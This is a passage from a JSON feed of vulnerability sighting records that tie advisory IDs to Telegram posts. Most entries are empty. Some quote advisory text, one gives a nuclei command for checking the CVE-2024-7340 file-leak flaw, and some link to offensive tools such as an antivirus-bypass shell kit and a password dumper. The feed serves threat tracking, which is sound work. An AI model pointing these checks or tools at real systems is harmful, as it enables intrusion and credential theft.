"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FWG-W59V-G942", "type": "exploited", "source": "https://t.me/arpsyndicate/2852", "content": "#ExploitObserverAlert\n\nGHSA-8fwg-w59v-g942\n\nDESCRIPTION: Exploit Observer has 13 entries in 3 file formats related to GHSA-8FWG-W59V-G942. This issue was addressed with improved state management. This issue is fixed in iOS 16.6 and iPadOS 16.6, macOS Big Sur 11.7.9, macOS Monterey 12.6.8, tvOS 16.6, watchOS 9.6, macOS Ventura 13.5, iOS 15.7.8 and iPadOS 15.7.8. An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.\n\nGHSS: 5.5", "creation_timestamp": "2024-01-16T13:08:07.000000Z"}, {"uuid": "a8df885c-2119-4f99-adad-2bfa8872d3bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MF6C-8R47-23J5", "type": "seen", "source": "https://t.me/arpsyndicate/2860", "content": "#ExploitObserverAlert\n\nGHSA-mf6c-8r47-23j5\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-MF6C-8R47-23J5. Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV.\n\nGHSS: 4.0", "creation_timestamp": "2024-01-16T15:08:38.000000Z"}, {"uuid": "0ce69838-fb80-4e65-94d6-44c20e2e815f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95HW-V8FQ-666Q", "type": "exploited", "source": "https://t.me/arpsyndicate/864", "content": "#ExploitObserverAlert\n\nGHSA-95hw-v8fq-666q\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-95HW-V8FQ-666Q. An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.", "creation_timestamp": "2023-12-02T00:26:35.000000Z"}, {"uuid": "10636bb1-5205-45a1-b0f2-d918178fc32d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2XW-HW8G-6773", "type": "seen", "source": "https://t.me/arpsyndicate/2756", "content": "#ExploitObserverAlert\n\nGHSA-x2xw-hw8g-6773\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-X2XW-HW8G-6773. Pages that are indexed in search results have their entire contents indexed, including any HTML code snippets. These HTML snippets would appear in the search results unsanitised, so it was possible to render arbitrary HTML or run arbitrary scripts.", "creation_timestamp": "2024-01-09T14:50:09.000000Z"}, {"uuid": "f6aebd72-c8ec-4b5d-955c-f92c417be310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8P63-MWFP-HJRV", "type": "seen", "source": "https://t.me/arpsyndicate/647", "content": "#ExploitObserverAlert\n\nGHSA-8p63-mwfp-hjrv\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-8P63-MWFP-HJRV.", "creation_timestamp": "2023-11-28T13:42:32.000000Z"}, {"uuid": "027bcd84-ca6f-46e6-8e8e-1a30a446618e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHHR-CQM7-GJV6", "type": "seen", "source": "https://t.me/arpsyndicate/1538", "content": "#ExploitObserverAlert\n\nGHSA-phhr-cqm7-gjv6\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-PHHR-CQM7-GJV6.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-07T12:29:41.000000Z"}, {"uuid": "ab1652f7-4444-42fd-a5f2-11fd6350d0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R49H-6QXQ-624F", "type": "published-proof-of-concept", "source": "https://t.me/BhinnekaSec/2642", "content": "Exploit for W&amp;B Weave Server - Remote Arbitrary File Leak (CVE-2024-7340)\ud83e\udd77\n\nDescription\ud83d\udd08\nThe Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n\nNuclei Template\ud83c\udf0e\nView the template here CVE-2024-7340.yaml\n\nValidate with Nuclei\necho \"$URL\" | nuclei -t ~/nuclei-templates/http/cves/2024/CVE-2024-7340.yaml\n\nReferences:\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-7340\nhttps://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/\nhttps://github.com/wandb/weave/pull/1657\nhttps://github.com/advisories/GHSA-r49h-6qxq-624f", "creation_timestamp": "2024-10-15T01:39:58.000000Z"}, {"uuid": "bc3ace86-dd8a-4f4b-bdc1-ae20edbdd214", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ88-6MR5-RCW8", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/995", "content": "Tools - Hackers Factory \n\nA complete security assessment tool that supports common web security issues scanning and custom POC | Be sure to read the document before using.\n\nhttps://github.com/securi3ytalent/xray-automation\n\nInstantly share code, notes, and snippets\n\nhttps://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n\nEDR &amp; Antivirus Bypass to Gain Shell Access\n\nhttps://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access\n\nServe as a reverse proxy to protect your web services from attacks and exploits\n\nhttps://github.com/chaitin/SafeLine\n\n[Android] Display useful information about your device privacy\n\nhttps://github.com/akexorcist/ruam-mij-android\n\nMultiple bugs leading to info leak and remote code execution\n\nhttps://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8\n\nDownload all the wallpapers in MKBHD's \"Panels\" app\n\nhttps://github.com/nadimkobeissi/mkbsd\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-29T07:52:16.000000Z"}, {"uuid": "f4c35e4f-f564-4b50-9f25-722976eb05fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WG33-5H85-7Q5P", "type": "published-proof-of-concept", "source": "Telegram/wjbFsyzpQP11Ml-lHL7H7iubcZXwVaQmfBZteKGvee5xE4c", "content": "", "creation_timestamp": "2025-02-06T19:00:35.000000Z"}, {"uuid": "eb35feb8-c1b5-4393-af4d-dff73d80dae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQ7R-P9CQ-5Q4F", "type": "published-proof-of-concept", "source": "Telegram/yaJsYPZYgfLnZwMJRpJPgIdVnrXmKv30ot-425xRj6JXaDk", "content": "", "creation_timestamp": "2025-05-11T00:30:21.000000Z"}, {"uuid": "4c4ce094-4fa3-4aa2-a154-f25d61615e22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889J-63JV-QHR8", "type": "seen", "source": "Telegram/SPFKx9VK0UKK3meLQejXUhvHFdDqiAXmv30HPV9KNF6DU3E", "content": "", "creation_timestamp": "2025-05-08T20:30:52.000000Z"}, {"uuid": "ea264748-5c39-4561-b15e-5d7f6793bd9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6PW4-JQHV-3626", "type": "seen", "source": "Telegram/t8K1XuU9DycjdS-BJ0HBwR2vMp2ysg1gNZKK5Q0_GJ-ZI8I", "content": "", "creation_timestamp": "2025-04-25T18:02:30.000000Z"}, {"uuid": "991a3251-c4fb-43c6-946a-cec508c96fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ6J-4388-4GG5", "type": "published-proof-of-concept", "source": "Telegram/z-TEGJuLb-MI9QSBe5sQLLsDPvx9hpDxWNGhFcSyGduHviQ", "content": "", "creation_timestamp": "2025-02-21T23:31:55.000000Z"}, {"uuid": "71f03a78-4046-4bdb-bed3-2e03e87f1f0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRHP-WFP2-59H5", "type": "published-proof-of-concept", "source": "Telegram/pCWefAz8NgtMQjK60Nt8tRL1XwN3sMZOhKLlzwYzNuYpUw4", "content": "", "creation_timestamp": "2025-01-08T20:30:50.000000Z"}, {"uuid": "35a30619-5717-4176-bd34-6266a13a3658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWFH-M3Q7-9JPW", "type": "published-proof-of-concept", "source": "Telegram/kKmhqMAO0G41xSuzHMEpIuMySOUPwocgu6rbuAMEaHx4Gt4", "content": "", "creation_timestamp": "2025-03-04T23:30:46.000000Z"}, {"uuid": "259b9e32-94c0-40e5-9f9f-06d3c2f57914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G8VQ-V3MG-7MRG", "type": "published-proof-of-concept", "source": "Telegram/Q4kJo2F2oL-NbaJrfC6LO8-y_S2Us6LVpftgoL4QtCPuQVY", "content": "", "creation_timestamp": "2025-03-20T20:00:50.000000Z"}, {"uuid": "1c748858-edc2-456b-8acf-1c81ccf29e96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3GW-9WW9-JMC3", "type": "seen", "source": "Telegram/t8K1XuU9DycjdS-BJ0HBwR2vMp2ysg1gNZKK5Q0_GJ-ZI8I", "content": "", "creation_timestamp": "2025-04-25T18:02:30.000000Z"}, {"uuid": "dad7e3dd-8b9c-4677-baf5-e6d8ed2b68cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CG-7GW9-V8CF", "type": "seen", "source": "Telegram/VmMuGE7Rb8M0CTKtbBCx8A-ZtXlhfTER7CBMGSEtWA4_Slk", "content": "", "creation_timestamp": "2025-03-11T09:31:03.000000Z"}, {"uuid": "4407d5fa-5e47-4648-b774-e2bc43583ee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G6WJ-3VM2-C59M", "type": "seen", "source": "Telegram/2nL-djrXFFAZli4zgPy3oHY71QtcrdGxrvGK9G6tPsd-u2s", "content": "", "creation_timestamp": "2025-02-18T22:34:41.000000Z"}, {"uuid": "3c8a4b8f-4ed1-4a95-af52-c5ca5f120eb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXJR-CW9Q-CWWG", "type": "seen", "source": "Telegram/2nL-djrXFFAZli4zgPy3oHY71QtcrdGxrvGK9G6tPsd-u2s", "content": "", "creation_timestamp": "2025-02-18T22:34:41.000000Z"}, {"uuid": "f3054b62-d002-4851-bf10-8015d20052e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GV7-4J8G-CVGP", "type": "seen", "source": "Telegram/2nL-djrXFFAZli4zgPy3oHY71QtcrdGxrvGK9G6tPsd-u2s", "content": "", "creation_timestamp": "2025-02-18T22:34:41.000000Z"}, {"uuid": "ac8e4289-02e7-4feb-a710-b5b3e1e03011", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F654-C5R5-JX77", "type": "published-proof-of-concept", "source": "Telegram/4XaNwPTMFyO1Vz7bqzn38wD37G0y60931j9yFHwcc2fnqpY", "content": "", "creation_timestamp": "2025-02-18T22:34:38.000000Z"}, {"uuid": "09cc3a08-6d99-4626-b795-4d0214e5f62a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QVP-39MM-95V8", "type": "seen", "source": "Telegram/MKyyCJNfVvpUH0P_EmhW7az9OPnbIUC-jF-3Mo1io2kFbkQ", "content": "", "creation_timestamp": "2025-03-07T18:01:34.000000Z"}, {"uuid": "927c2b6a-5dd8-4ecb-b7ba-5e2b5382cdef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WMXH-PXCX-9W24", "type": "seen", "source": "Telegram/MKyyCJNfVvpUH0P_EmhW7az9OPnbIUC-jF-3Mo1io2kFbkQ", "content": "", "creation_timestamp": "2025-03-07T18:01:34.000000Z"}, {"uuid": "deb40483-347d-4f59-856d-46d63bc72437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3W9F-2PPH-J5VC", "type": "seen", "source": "Telegram/MKyyCJNfVvpUH0P_EmhW7az9OPnbIUC-jF-3Mo1io2kFbkQ", "content": "", "creation_timestamp": "2025-03-07T18:01:34.000000Z"}, {"uuid": "3b660492-2627-4df3-bdfc-936f2b702553", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2PH-7G93-HW3M", "type": "seen", "source": "Telegram/MKyyCJNfVvpUH0P_EmhW7az9OPnbIUC-jF-3Mo1io2kFbkQ", "content": "", "creation_timestamp": "2025-03-07T18:01:34.000000Z"}, {"uuid": "3b313189-2469-4cc1-881a-4ec5e115a66c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JR5F-V2JV-69X6", "type": "seen", "source": "Telegram/GvPZHyEbeVxrI-_IlIz9tH0tmbQ0NIgaQyLb0r6ME-4MX0o", "content": "", "creation_timestamp": "2025-03-07T17:01:02.000000Z"}, {"uuid": "5d86b003-7072-4727-b2ed-63660deda547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWHH-Q4H6-W599", "type": "published-proof-of-concept", "source": "Telegram/18aGabcqT47rhbAtmBCfjbslvF7WShvEcg6GVkQNwRNaIHA", "content": "", "creation_timestamp": "2025-02-27T15:30:14.000000Z"}, {"uuid": "6eb680ec-17fd-4d44-9288-0e4c0a6c99e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWF8-5Q9W-M763", "type": "published-proof-of-concept", "source": "Telegram/ovbtZKoroWRTUmp0mBAhDILdax9lr2tflhGI-LGMG8-Ufts", "content": "", "creation_timestamp": "2025-02-21T10:00:21.000000Z"}, {"uuid": "c48b2224-4149-4da1-8a5b-1bdae6e54648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2M84-5HFW-M8V4", "type": "published-proof-of-concept", "source": "Telegram/_yKpLY-2F8rkEOUTUq6LWKwJhxpg13wwviIMmbyTTpOtBuI", "content": "", "creation_timestamp": "2025-02-25T09:01:42.000000Z"}, {"uuid": "1f822a65-e53d-4090-b26a-d1297a862096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC5V-G79P-7HCH", "type": "published-proof-of-concept", "source": "Telegram/z-TEGJuLb-MI9QSBe5sQLLsDPvx9hpDxWNGhFcSyGduHviQ", "content": "", "creation_timestamp": "2025-02-21T23:31:55.000000Z"}, {"uuid": "fba617e0-b532-4b23-b2ed-68623b6a6d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXQG-P22H-3F32", "type": "published-proof-of-concept", "source": "Telegram/4XaNwPTMFyO1Vz7bqzn38wD37G0y60931j9yFHwcc2fnqpY", "content": "", "creation_timestamp": "2025-02-18T22:34:38.000000Z"}, {"uuid": "4874a085-6022-431d-800b-cd58257d8509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QHX-GFQJ-VM2J", "type": "published-proof-of-concept", "source": "Telegram/4XaNwPTMFyO1Vz7bqzn38wD37G0y60931j9yFHwcc2fnqpY", "content": "", "creation_timestamp": "2025-02-18T22:34:38.000000Z"}, {"uuid": "37c563e6-c55c-4a14-925b-17275f5c73b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3GH-529W-V32X", "type": "seen", "source": "Telegram/1O5z91QcHmrjRz26b3O2xs57dQF3nVw-sSDMEN0aU64nGRA", "content": "", "creation_timestamp": "2025-03-04T18:31:35.000000Z"}, {"uuid": "5eee0125-f57e-4ce8-abb9-655d2f01db89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HW62-58PR-7WC5", "type": "published-proof-of-concept", "source": "Telegram/z-TEGJuLb-MI9QSBe5sQLLsDPvx9hpDxWNGhFcSyGduHviQ", "content": "", "creation_timestamp": "2025-02-21T23:31:55.000000Z"}, {"uuid": "c929f5c5-cd17-41ff-8fef-229f390e353b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QXH-P7JC-5XH6", "type": "published-proof-of-concept", "source": "Telegram/z-TEGJuLb-MI9QSBe5sQLLsDPvx9hpDxWNGhFcSyGduHviQ", "content": "", "creation_timestamp": "2025-02-21T23:31:55.000000Z"}, {"uuid": "4b9e0692-050f-4e8e-b8f9-fff714e14a71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F42G-R5JJ-QH4J", "type": "published-proof-of-concept", "source": "Telegram/2BvzDhkA_vypO7mGv4Hm3zZ8Jlh39uY-jml8MP6LdNmQUR4", "content": "", "creation_timestamp": "2025-02-19T18:00:38.000000Z"}, {"uuid": "fb0aad41-376a-44c2-9425-a7d203922085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CWJ-P4X6-PP88", "type": "published-proof-of-concept", "source": "Telegram/qzNJGCFsMgJglun_Y4ryMwfMDSyhIyGxTghteqtBbNONQb0", "content": "", "creation_timestamp": "2025-02-18T22:34:40.000000Z"}, {"uuid": "5166de83-505f-4724-843d-7f4f213bbc17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65H2-7484-2PWW", "type": "published-proof-of-concept", "source": "Telegram/qzNJGCFsMgJglun_Y4ryMwfMDSyhIyGxTghteqtBbNONQb0", "content": "", "creation_timestamp": "2025-02-18T22:34:40.000000Z"}, {"uuid": "b2fdccad-bd07-4219-9365-82021aaf6a3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P7C-9HCX-JPQJ", "type": "published-proof-of-concept", "source": "Telegram/qzNJGCFsMgJglun_Y4ryMwfMDSyhIyGxTghteqtBbNONQb0", "content": "", "creation_timestamp": "2025-02-18T22:34:40.000000Z"}, {"uuid": "b83143fe-71bf-4fea-ada4-e13ded5af3e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q273-4VCJ-QQP4", "type": "published-proof-of-concept", "source": "Telegram/qzNJGCFsMgJglun_Y4ryMwfMDSyhIyGxTghteqtBbNONQb0", "content": "", "creation_timestamp": "2025-02-18T22:34:40.000000Z"}, {"uuid": "7a584665-ce54-4ebf-ba93-29da69ffda4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7JX-GGV8-V2RH", "type": "published-proof-of-concept", "source": "Telegram/qzNJGCFsMgJglun_Y4ryMwfMDSyhIyGxTghteqtBbNONQb0", "content": "", "creation_timestamp": "2025-02-18T22:34:40.000000Z"}, {"uuid": "1da6d179-fc11-4a66-b4ca-4799858db93e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFP2-6QHM-7X43", "type": "published-proof-of-concept", "source": "Telegram/pKc-k4S4UpucBi-A8jZui2WxqHw-KLQAnPldAvhIPnjHqVQ", "content": "", "creation_timestamp": "2025-03-19T20:00:51.000000Z"}, {"uuid": "029d9ea7-c39f-4090-bfcf-d13aa2ee2041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ9G-9VFC-CFQ9", "type": "published-proof-of-concept", "source": "Telegram/5NPz2sx_xB9j3hzmo-oIJEJq6Lsm0ce4bHKBo0XPqbJTGio", "content": "", "creation_timestamp": "2025-03-19T17:30:32.000000Z"}, {"uuid": "e2da365b-d6c5-4446-a534-94ca7f2e1961", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3M8-F7G5-QHM7", "type": "published-proof-of-concept", "source": "Telegram/5NPz2sx_xB9j3hzmo-oIJEJq6Lsm0ce4bHKBo0XPqbJTGio", "content": "", "creation_timestamp": "2025-03-19T17:30:32.000000Z"}, {"uuid": "f97433b3-45ec-4b50-8068-af2627bce76f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5WX-PV8J-F96H", "type": "published-proof-of-concept", "source": "Telegram/4XaNwPTMFyO1Vz7bqzn38wD37G0y60931j9yFHwcc2fnqpY", "content": "", "creation_timestamp": "2025-02-18T22:34:38.000000Z"}, {"uuid": "05096223-e4ad-40f1-887f-51901e89a7d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5F2-JWM7-MMQ2", "type": "published-proof-of-concept", "source": "https://t.me/Leak_DBMS/1523", "content": "\ud83d\udee1PHP\nAffected versions\n&lt; 8.1.31\n&lt; 8.2.26\n&lt; 8.3.14\nConfiguring a proxy in a stream context might allow for CRLF injection in URIs (CVE-2024-11234)\n\ud83d\udca5https://github.com/php/php-src/security/advisories/GHSA-c5f2-jwm7-mmq2\n\ud83d\udd16@Leak_DBMS", "creation_timestamp": "2024-11-26T21:49:35.000000Z"}, {"uuid": "c0631f59-95e0-4546-bd3e-b1c119288621", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VXXJ-38M8-46GM", "type": "seen", "source": "Telegram/G3CLBIWl3EerOZmVyTyr5ftdBJO0M5-W3nYiVeHhzv5XeQs", "content": "", "creation_timestamp": "2024-04-24T02:47:40.000000Z"}, {"uuid": "ed6ca207-7ec1-42be-bab6-66e07d122728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X7CH-H5RF-W2MF", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3192", "content": "Hackers Factory \n\nList of awesome reverse engineering resources\n\nhttps://github.com/wtsxDev/reverse-engineering\n\nA repository of KQL queries focused on threat hunting and threat detecting for Microsoft Sentinel &amp; Microsoft 365 Defender.\n\nhttps://github.com/cyb3rmik3/KQL-threat-hunting-queries\n\nEnumerate information from NTLM authentication enabled web endpoints\n\nhttps://github.com/pwnfoo/NTLMRecon/\n\nA tool for firmware cartography\n\nhttps://github.com/quarkslab/pyrrha\n\nGCC's -fstack-protector fails to guard dynamic stack allocations on ARM64\n\nhttps://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf\n\nchai - Experience Zero Trust security with Chai! Convert and view documents as vivid images right in your browser. No mandatory downloads, no hassle\u2014just pure, joyful security! \n\nhttps://github.com/dosyago/chai\n\nA simple hash-based virus-scanner\n\nhttps://github.com/Raspirus/Raspirus\n\nHysteria is a powerful, lightning fast and censorship resistant proxy.\n\nhttps://github.com/apernet/hysteria\n\nOriginal PoC for CVE-2023-32784\n\nhttps://github.com/vdohney/keepass-password-dumper\n\nA private, p2p alternative to Slack and Discord built on Tor &amp; IPFS\n\nhttps://github.com/TryQuiet/quiet\n\nA modern tool written in Python that automates your xss findings.\n\nhttps://github.com/faiyazahmad07/xss_vibes/\n\n#infosec #cybersecurity #hackersfactory\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-04-26T11:49:12.000000Z"}, {"uuid": "90c20ccd-7fc3-41c1-a67a-b85c0eb05e51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27XQ-W3JC-436C", "type": "published-proof-of-concept", "source": "Telegram/fsM6hZYYYnpbOLEJwsGnDg-QbbXkPAbnymzEekIhPXwf-kc", "content": "", "creation_timestamp": "2024-03-23T14:42:30.000000Z"}, {"uuid": "b6a81470-ff26-4917-955d-624aaff251b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GW42-F939-FHVM", "type": "published-proof-of-concept", "source": "Telegram/lkClufF-GFiKfd1u8hBBFNIpsNZxzvyNF6UElFxMqURbP0g", "content": "", "creation_timestamp": "2023-07-24T16:23:05.000000Z"}, {"uuid": "3604fc35-720e-4f43-a212-b4341aaecc6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VHXG-9WFX-7FCJ", "type": "published-proof-of-concept", "source": "Telegram/FS_aGd7NPqhAUoD6QQ6poWCZk70gALF5OHUbODb75o1lvL0", "content": "", "creation_timestamp": "2022-10-13T10:23:04.000000Z"}, {"uuid": "24be2c61-2816-40be-bc09-c449464107b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6483-HCPP-P75W", "type": "published-proof-of-concept", "source": "Telegram/xjZhV_f2I40u_gZ5Y9pOVFhnJN0E2bmWml1qQJ167kLkCRw", "content": "", "creation_timestamp": "2022-09-24T18:28:05.000000Z"}, {"uuid": "a21529f5-ca40-4b13-a2f2-9b52834e61c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1417", "type": "seen", "source": "https://t.me/ctinow/211785", "content": "https://ift.tt/AYcSKr8\nRHSA-2024:1417: Moderate: libX11 security update", "creation_timestamp": "2024-03-19T18:16:30.000000Z"}, {"uuid": "acc14a95-dc0e-416a-a5c8-b84b5b654030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1089", "type": "seen", "source": "https://t.me/ctinow/206840", "content": "https://ift.tt/JeE0qyC\nRHSA-2024:1089: 